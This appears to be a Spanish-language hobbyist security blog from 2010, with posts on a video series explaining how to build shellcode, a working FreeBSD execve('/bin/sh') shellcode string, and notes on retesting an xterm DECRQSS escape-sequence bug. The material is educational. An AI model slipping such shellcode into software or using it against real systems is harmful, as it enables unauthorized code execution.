domingo, 14 de febrero de 2010

shellcode para freebsd

Esta es la shellcode que mostré en el video "Explicando los shellcode tercera entrega", para linux habría que cambiar el numero de la llamada al sistema, y creo que con eso debería de funcionar, sin embargo tengo entendido que linux usa los registros para colocar los argumentos de la función a llamar, si esto es así, entonces lo que se necesita es un cambio total xDDD

La shellcode es totalmente ineficiente, pero es lo simple que se le puede mostrar aalquien que esta aprendiendo este tema.


char *shellcode = "\xeb\x1c\x5e\x89\x75\x04\x31\xc0\x50\x89\x45\x08\xb0\x3b\x8d\x4d\x04\x51\x56\x50\xcd\x80\x31\xc0\x50\xb0\x01\x50\xcd\x80\xe8\xdf\xff\xff\xff/bin/sh";

sábado, 13 de febrero de 2010

Explicando los shellcode tercera entrega

Bien sobre el tema de los videos de Heuristica y Explotacion de vulnerabilidades he agregado uno nuevo esta es la tercera entrega de "Explicando los shellcode"

Explicando los shellcode 3/5

Se termina de construir un shellcode desde 0 y se muestra la ejecución del mismo.
Se explica brevemente algunas instrucciones, ya que se da por hecho que se conoce algo de ensamblador.


- Anon

domingo, 7 de febrero de 2010

xterm 253 DECRQSS Again ??

Anteriormente había hecho un video sobre un bug en xterm y los DECRQSS

Video - CVE-2008-2383 xterm DECRQSS

Pues parece que la cosa no ha terminado ahi, estado testando un poco con el xterm y los DECRQSS, parece ser no arreglaron bien el bug.

Testeando me han pasado muchas cosas raras, el terminal (xterm) se ha cerrado, ha tratado de ejecutar comandos y bueno muchas cosas de las que se supone no deberían de pasar.

Tengo unas imágenes de PoC, no he podido aislar el código maligno, sin embargo cada vez estoy mas cerca.


Primero la versión del xterm 253 (Actualizado con la ultima versión de ports desde freebsd)

Y después de hacer el cat a un archivo vemos múltiples Command not fount


Lo cual  es muestra de que algo va mal.

Les mantendré informados

- Anon

jueves, 14 de enero de 2010

I (L) MySQL!!

MySQL hace mi trabajo mas fácil xD

Los reportes los entrego en 10 minutos y me quedan 4hrs para divagar por internet

- Anon

viernes, 8 de enero de 2010

Lo siento, pero no tienes acceso a esta página

ERROR, TU NAVEGADOR ME DICE QUE QUIERES ENTRAR A UN LUGAR PROHIBIDO
// Lo que buscas esta muy lejos de aqui
<!--correcto='Security-Focus'-->

Para los que sepan de que trata lo anterior, solo me falta atar unas cuantas cosas para resolver el reto.

- Anon

miércoles, 6 de enero de 2010

Explicando los shellcode 1/5

Se explica a continuacion lo que es el shellcode y como construir uno desde cero.

Estén pendientes que faltan otras 4 o 5 entregas.

Saludos

Populares Siempre